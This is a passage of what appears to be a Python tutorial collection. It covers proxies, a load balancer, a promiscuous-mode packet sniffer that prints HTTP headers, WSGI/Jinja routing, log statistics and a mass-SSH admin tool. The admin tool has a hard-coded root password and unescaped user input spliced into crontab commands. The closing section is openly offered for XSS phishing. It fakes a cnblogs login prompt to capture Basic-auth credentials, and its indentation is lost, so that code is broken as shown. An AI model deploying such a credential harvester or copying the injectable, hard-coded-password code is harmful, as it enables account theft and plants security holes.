    sub = rHost.split(".")[0]
    # Forward only requests whose Host header starts with "lyshark."
    if sub == "lyshark":
        response = requests.get(url="http://www.baidu.com", timeout=10)
        by = bytes(response.text, encoding="utf-8")
        # Other useful environ keys:
        # HTTP_USER_AGENT
        # REQUEST_METHOD
        # PATH_INFO
        return [by,]
    response = b"<b> 404 not found </b>"
    return [response,]

if __name__ == "__main__":
    httpd = make_server("0.0.0.0", 8080, RunServer)
    print("[*] Server started on 0.0.0.0:8080")
    httpd.serve_forever()
With a small change it turns into a (very crude) load balancer.
from wsgiref.simple_server import make_server
import requests, random

def RunServer(environ, start_response):
    start_response("200 OK", [('Content-Type', 'text/html;charset=utf-8')])
    rHost = environ["HTTP_HOST"]
    sub = rHost.split(".")[0]
    a = ["http://192.168.1.10", "http://192.168.1.20"]
    print(rHost, sub)
    # Pick one backend at random for every incoming request
    response = requests.post(url=random.choice(a), timeout=10)
    by = bytes(response.text, encoding="utf-8")
    return [by,]

if __name__ == "__main__":
    httpd = make_server("0.0.0.0", 8080, RunServer)
    httpd.serve_forever()
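Random choice spreads the load only on average. A round-robin picker hands out backends strictly in turn; the sketch below is one possible way to write it, and the `RoundRobin` class is a made-up helper rather than anything from the code above.

```python
import itertools

class RoundRobin:
    """Hand out backends one after another, wrapping around at the end."""

    def __init__(self, backends):
        self._cycle = itertools.cycle(list(backends))

    def next_backend(self):
        return next(self._cycle)

balancer = RoundRobin(["http://192.168.1.10", "http://192.168.1.20"])
picks = [balancer.next_backend() for _ in range(4)]
print(picks)
```

In a threaded server the call to `next_backend()` would probably need a lock around it; the single-threaded `wsgiref` server does not.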
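Python IP-layer capture: promiscuous mode and packet capture. Decoding the packets is left to the reader.
import os, socket, struct
from ctypes import *

socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind(("192.168.1.2", 0))
# Include the IP header in what recvfrom() returns
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# SIO_RCVALL is Windows-only; it switches the interface to promiscuous mode
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
while True:
    raw_buffer = sniffer.recvfrom(65565)[0]
    print(raw_buffer.decode('utf-8', 'ignore'))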
A more powerful filter
import os, socket, struct
from ctypes import *

socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)
sniffer.bind(("192.168.1.2", 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
while True:
    raw_buffer = sniffer.recvfrom(65565)[0]
    string = str(raw_buffer.decode('utf-8', 'ignore')).splitlines()
    # Print only the lines that look like interesting HTTP headers
    for each in string:
        if each.find('Host') >= 0:
            print("------------------------------------------------------------")
            print(each)
        elif each.find('Referer') >= 0:
            print(each)
        elif each.find('Accept') >= 0:
            print(each)
List comprehensions
'''
# di is the directory to scan; it must end with a path separator
aa = [x for x in os.listdir(di) if os.path.splitext(x)[1] == ".png"]
pen = []
print(aa)
for i in aa:
    dd = di + i
    print("[+] dirname: {} {}".format(dd, os.stat(dd).st_size))
    pen.append(os.stat(dd).st_size)
print(pen)
'''
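A runnable take on the same idea, as a rough sketch: it builds a throwaway directory with `tempfile` so nothing on disk has to exist beforehand. `png_sizes` and the file names are made up for the demo.

```python
import os
import tempfile

def png_sizes(directory):
    """Map every .png file name in directory to its size in bytes."""
    names = [n for n in os.listdir(directory) if os.path.splitext(n)[1] == ".png"]
    return {n: os.stat(os.path.join(directory, n)).st_size for n in sorted(names)}

with tempfile.TemporaryDirectory() as tmp:
    # Create two .png files and one file that should be filtered out
    for name, payload in [("a.png", b"1234"), ("b.txt", b"xx"), ("c.png", b"")]:
        with open(os.path.join(tmp, name), "wb") as fp:
            fp.write(payload)
    sizes = png_sizes(tmp)

print(sizes)
```

Using `os.path.join` avoids the requirement that the directory string ends with a separator.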
The essence of a Python web server: jinja.html
<body>
<h1>{{name}}</h1>
<ul>
{% for item in user_list %}
<li>{{item}}</li>
{% endfor %}
</ul>
</body>
main.py
from wsgiref.simple_server import make_server
from jinja2 import Template

def index():
    with open("./index.html", "r", encoding="utf-8") as fp:
        recv = fp.read()
    return recv.encode("utf-8")

def jinja():
    with open("./jinja.html", "r", encoding="utf-8") as fp:
        data = fp.read()
    template = Template(data)
    recv = template.render(name='John Doe', user_list=['alex', 'eric'])
    return recv.encode("utf-8")

# Routing table: URL path -> handler function
url_func = [
    ('/index/', index), ('/jinja/', jinja)]

def RunServer(environ, start_response):
    start_response("200 OK", [('Content-Type', 'text/html;charset=utf-8')])
    url = environ["PATH_INFO"]
    rAddr = environ["REMOTE_ADDR"]
    rHost = environ["HTTP_HOST"]
    print("[+] Host: {} Path: {} Client IP: {}".format(rHost, url, rAddr))
    func = None
    for i in url_func:
        if i[0] == url:
            func = i[1]
            break
    if func:
        response = func()
    else:
        response = b"<b> 404 not found </b>"
    return [response,]

if __name__ == "__main__":
    httpd = make_server("0.0.0.0", 8080, RunServer)
    print("[*] Server started on 0.0.0.0:8080")
    httpd.serve_forever()
Once it is running, visit the template page (/jinja/) to see the rendered result.
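The routing step is the core of it: look up the path, call the handler, return bytes. Here is a stripped-down sketch that can be exercised without starting a server. The handlers, the `ROUTES` dict and the `call` helper are all invented for illustration, and unlike the code above it answers unknown paths with a real 404 status.

```python
def index():
    return b"<h1>index</h1>"

def about():
    return b"<h1>about</h1>"

# Routing table: URL path -> handler function
ROUTES = {"/index/": index, "/about/": about}

def app(environ, start_response):
    handler = ROUTES.get(environ.get("PATH_INFO", ""))
    if handler is None:
        start_response("404 Not Found", [("Content-Type", "text/html; charset=utf-8")])
        return [b"<b> 404 not found </b>"]
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [handler()]

def call(path):
    """Invoke the WSGI app directly with a minimal fake environ."""
    captured = {}
    def start_response(status, headers):
        captured["status"] = status
    body = b"".join(app({"PATH_INFO": path}, start_response))
    return captured["status"], body

print(call("/index/"))
print(call("/missing/"))
```

Because a WSGI app is just a callable, `app` can be passed to `make_server` unchanged.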
Packaging a Python program: run python setup.py build
import sys
from cx_Freeze import setup, Executable

base = None
if sys.platform == "win32":
    # Win32GUI hides the console window on Windows
    base = "Win32GUI"

setup(
    name = "MyApp",
    version = "0.1",
    description = "My python",
    executables = [Executable("daili.py", base=base)]
)
Dynamic progress bar: a reworked version that can reproduce the msf-style effect.
import os, time

def DynamicBar(scale, sleep):
    start = time.perf_counter()
    for item in range(scale + 1):
        StartProgress = item * "#"
        EndProgress = (scale - item) * "."
        Count = (item / scale) * 100
        dur = time.perf_counter() - start      # seconds elapsed since the bar started
        # "\r" returns to the start of the line so the bar is redrawn in place
        print("\r{:^3.0f}%[ {}->{} ]{:.2f}s".format(Count, StartProgress, EndProgress, dur), end="")
        time.sleep(sleep)

banner = r'''
__ __ __
/ | / | / |
$$ | __ __ _______ $$ |____ ______ ______ $$ | __
$$ |/ | / | / |$$ / / $$ | / |
$$ |$$ | $$ |/$$$$$$$/ $$$$$$$ | $$$$$$ |/$$$$$$ |$$ |_/$$/
$$ |$$ | $$ |$$ $$ | $$ | / $$ |$$ | $$/ $$ $$<
$$ |$$ \__$$ | $$$$$$ |$$ | $$ |/$$$$$$$ |$$ | $$$$$$
$$ |$$ $$ |/ $$/ $$ | $$ |$$ $$ |$$ | $$ | $$ |
$$/ $$$$$$$ |$$$$$$$/ $$/ $$/ $$$$$$$/ $$/ $$/ $$/
/ \__$$ |
$$ $$/
$$$$$$/
'''

if __name__ == "__main__":
    os.system("cls")
    print(banner)
    DynamicBar(50, 0.1)
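Converting an image to character art:
import argparse
from PIL import Image

def get_char(r, g, b, alpha=256):
    ascii_char = list("~!@#$%^&*()_+ ")
    if alpha == 0:
        return " "
    length = len(ascii_char)
    # Weighted luminance of the pixel, mapped onto the character ramp
    gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
    unit = (256.0 + 1) / length
    return ascii_char[int(gray / unit)]

if __name__ == "__main__":
    # The original never defined args; this argparse interface (names and defaults) is an assumption
    parser = argparse.ArgumentParser()
    parser.add_argument("file", nargs="?")
    parser.add_argument("--width", type=int, default=80)
    parser.add_argument("--height", type=int, default=40)
    args = parser.parse_args()
    if args.file != None:
        # RGBA guarantees that getpixel() returns (r, g, b, alpha)
        img = Image.open(args.file).convert("RGBA")
        img = img.resize((args.width, args.height), Image.NEAREST)
        txt = ""
        for row in range(args.height):
            for col in range(args.width):
                txt += get_char(*img.getpixel((col, row)))
            txt += "\n"
        print(txt)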
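The mapping from brightness to character can be tried without Pillow by feeding it plain RGB tuples. A minimal sketch: `to_char` and `rows_to_text` are made-up names, and the index is computed with integer arithmetic instead of the `unit` division used above.

```python
RAMP = "~!@#$%^&*()_+ "   # dark pixels map to the left, bright pixels to the right

def to_char(r, g, b):
    """Pick a ramp character from the weighted luminance of one pixel."""
    gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
    index = gray * len(RAMP) // 256      # always within 0..len(RAMP)-1
    return RAMP[index]

def rows_to_text(pixels):
    """Convert a list of rows of (r, g, b) tuples into character art."""
    return "\n".join("".join(to_char(*p) for p in row) for row in pixels)

black, white = (0, 0, 0), (255, 255, 255)
print(rows_to_text([[black, white], [white, black]]))
```

Black lands on the first ramp character and white on the last one (a space), so the tiny checkerboard prints as two characters per row.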
Automated server management in Python
import paramiko

ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

def ssh_cmd(user, passwd, port, userfile, cmd):
    check_ok = []
    check_er = []
    # One host per line; blank lines are ignored
    with open(userfile, "r") as file:
        hosts = [h.strip() for h in file if h.strip()]
    for host in hosts:
        print("-------------------------------------------->" + host + "<--------------------------------------------\n")
        try:
            ssh.connect(hostname=host, port=int(port), username=user, password=passwd)
            stdin, stdout, stderr = ssh.exec_command(cmd)
            result = stdout.read()
            if not result:
                result = stderr.read()
            ssh.close()
            print(result.decode())
            check_ok.append(host)
        except Exception:
            check_er.append(host)
            continue
    print("\n--------------------------------------------------------------------------------------------------------")
    print("Host IP Port Command Status")
    print("--------------------------------------------------------------------------------------------------------")
    for host in check_ok:
        print(host + " " + port + " " + cmd + " [done]")
    for host in check_er:
        print(host + " " + port + " " + cmd + " [failed]")
    print("--------------------------------------------------------------------------------------------------------")
def ssh_put(user, passwd, source, target):
    check_ok = []
    check_er = []
    with open("./ip.txt", "r") as file:
        hosts = [h.strip() for h in file if h.strip()]
    for host in hosts:
        print("============================================>" + host + "<============================================")
        try:
            transport = paramiko.Transport((host, 22))
            transport.connect(username=user, password=passwd)
            sftp = paramiko.SFTPClient.from_transport(transport)
            sftp.put(source, target)
            transport.close()
            check_ok.append(host)
        except Exception:
            check_er.append(host)
            continue
    print("\n--------------------------------------------------------------------------------------------------------")
    print("Host IP Port Source Target Status\n")
    print("--------------------------------------------------------------------------------------------------------")
    for host in check_ok:
        print(host + " " + "22" + " " + source + " " + target + " " + "[done]")
    for host in check_er:
        print(host + " " + "22" + " " + source + " " + target + " " + "[failed]")
    print("--------------------------------------------------------------------------------------------------------")
while True:
    try:
        shell = str(input("[Shell] # "))
        if (shell == ""):
            continue
        elif (shell == "exit"):
            exit()
        elif (shell == "put"):
            ssh_put("root", "123123", "./a.py", "/root/a.py")
        elif (shell == "cron"):
            temp = input("Enter a cron job to add: ")
            # Append the new entry to the existing crontab
            temp1 = "(crontab -l; echo '" + temp + "') | crontab"
            ssh_cmd("root", "123123", "22", "./user_ip.conf", temp1)
        elif (shell == "uncron"):
            temp = input("Enter the cron job to delete: ")
            # Rewrite the crontab without the lines that match the entry
            temp1 = "crontab -l | grep -v '" + temp + "' | crontab"
            ssh_cmd("root", "123123", "22", "./user_ip.conf", temp1)
        else:
            ssh_cmd("lyshark", "123123", "22", "./user_ip.conf", shell)
    except Exception:
        continue
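Access log statistics: a crippled version.
import re
from datetime import datetime

lis = {}
ls = []
fmt = "%d/%b/%Y:%H:%M:%S"
# Compare parsed timestamps; comparing the raw strings would order them alphabetically, not by date
start = datetime.strptime("17/Mar/2020:14:16:25", fmt)
end = datetime.strptime("11/Apr/2020:07:03:56", fmt)
with open("c://access.log", "r", encoding="utf-8") as fp:
    for each in fp:
        try:
            data = datetime.strptime(each.split()[3][1:], fmt)
            if start <= data <= end:
                # Keep the first token inside the parentheses of the User-Agent
                t = each.split("(")[1]
                t1 = re.sub(r";.*$|\)|\(", "", t).strip()
                ls.append(t1)
        except Exception:
            pass
for item in set(ls):
    lis[item] = ls.count(item)
print(lis)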
Second version
import os, sys, re, time
from datetime import datetime
import matplotlib.pyplot as plt

def Count_Equipment(log_name, start_time, end_time):
    Agent = []
    fmt = "%d/%b/%Y:%H:%M:%S"
    # The range is still hard-coded in this version; timestamps are parsed so the comparison is by date
    start = datetime.strptime("17/Mar/2020:14:16:25", fmt)
    end = datetime.strptime("11/Apr/2020:07:03:56", fmt)
    with open(log_name, "r", encoding="utf-8") as fp:
        for each in fp:
            try:
                data = datetime.strptime(each.split()[3][1:], fmt)
                if start <= data <= end:
                    Agent.append(each.split()[13].replace("\n", ""))
            except Exception:
                pass
    dic, list_num = {}, set(Agent)
    for item in list_num:
        num = Agent.count(item)
        dic[item] = num
    # Sort the key/value pairs by count, largest first
    di = sorted(dic.items(), key=lambda x: x[1], reverse=True)
    news = di[0:10:1]           # keep the 10 largest
    dic_news = dict(news)
    x, y = [], []
    for k in dic_news:
        x.append(k)
        y.append(dic_news[k])
    plt.title("Top 10 visiting device types")
    plt.xticks(rotation=70)
    for a, b in zip(x, y):
        plt.text(a, b, '%.0f' % b, ha='center', va='bottom', fontsize=7)
    plt.bar(x, y)
    plt.show()

Count_Equipment("c://access_log", "2020-03-11", "2020-03-17")
import os, sys, re, time
from datetime import datetime
import matplotlib.pyplot as plt

def Count_Equipment(log_name, start_time, end_time):
    Agent = []
    # Parse the range once, outside the loop, and compare dates rather than strings
    start = datetime.strptime(start_time, "%Y-%m-%d").date()
    end = datetime.strptime(end_time, "%Y-%m-%d").date()
    with open(log_name, "r", encoding="utf-8") as fp:
        for each in fp:
            try:
                data = each.split()[3][1:]
                day = datetime.strptime(data.split(":")[0], "%d/%b/%Y").date()
                if start <= day <= end:
                    Agent.append(each.split()[13].replace("\n", ""))
            except Exception:
                pass
    dic, list_num = {}, set(Agent)
    # Build a dict with the device type as key and its count as value
    for item in list_num:
        num = Agent.count(item)
        dic[item] = num
    # Sort the key/value pairs by count, largest first
    item = sorted(dic.items(), key=lambda x: x[1], reverse=True)
    dic_news = dict(item[0:10:1])   # keep the 10 most frequent device types
    x, y = [], []
    for k in dic_news:
        x.append(k)
        y.append(dic_news[k])
    plt.title("Top 10 visiting device types")
    plt.xticks(rotation=70)
    for a, b in zip(x, y):
        plt.text(a, b, '%.0f' % b, ha='center', va='bottom', fontsize=7)
    plt.bar(x, y)
    plt.show()

Count_Equipment("c://access_log", "2020-03-11", "2020-03-17")
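The counting part can be checked on a few in-memory lines before pointing it at a real log. In this sketch `collections.Counter` replaces the set-plus-count loop, and timestamps are parsed with `datetime.strptime` so the range test is by date. The sample lines, the `count_clients` name and the choice to count by client IP (field 0) are all assumptions made for the demo.

```python
from collections import Counter
from datetime import datetime

LOG_TIME_FORMAT = "%d/%b/%Y:%H:%M:%S"

def count_clients(lines, start, end):
    """Count requests per client IP for entries whose timestamp is in [start, end]."""
    counts = Counter()
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        try:
            stamp = datetime.strptime(fields[3].lstrip("["), LOG_TIME_FORMAT)
        except ValueError:
            continue                    # skip lines with a malformed timestamp
        if start <= stamp <= end:
            counts[fields[0]] += 1
    return counts

sample = [
    '10.0.0.1 - - [17/Mar/2020:14:16:25 +0800] "GET / HTTP/1.1" 200 512',
    '10.0.0.2 - - [01/Apr/2020:09:00:00 +0800] "GET /a HTTP/1.1" 200 128',
    '10.0.0.1 - - [02/Apr/2020:10:30:00 +0800] "GET /b HTTP/1.1" 404 0',
    '10.0.0.3 - - [12/Apr/2020:08:00:00 +0800] "GET /c HTTP/1.1" 200 64',
]
result = count_clients(sample, datetime(2020, 3, 17), datetime(2020, 4, 11, 23, 59, 59))
print(result.most_common())
```

`most_common(10)` then gives the top-10 list directly, already sorted from largest to smallest.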
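Building a simple HTTP Basic authentication prompt: Basic authentication is a lightweight identity check provided by the web server. The tool implemented here can be used for phishing embedded via XSS.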
import socketserver
import http.server
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if str(self.headers).find('UserLogin=1') > 0:
self.send_response(302)
self.send_header('Location', 'https://account.cnblogs.com/signin')
self.end_headers()
else:
if str(self.headers).find('Authorization: Basic ') > 0:
self.send_response(302)
self.send_header('Set-Cookie', 'UserLogin=1')
self.send_header('Location', 'https://account.cnblogs.com/signin')
print("------------------------------------------------------------")
print(str(self.headers))
else:
self.send_response(401)
self.send_header('Content-type', 'text/html; charset=UTF-8')
self.send_header('WWW-Authenticate',
'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"')
self.end_headers()
httpd = socketserver.TCPServer(("0.0.0.0", 9999), RequestHandler)
httpd.serve_forever()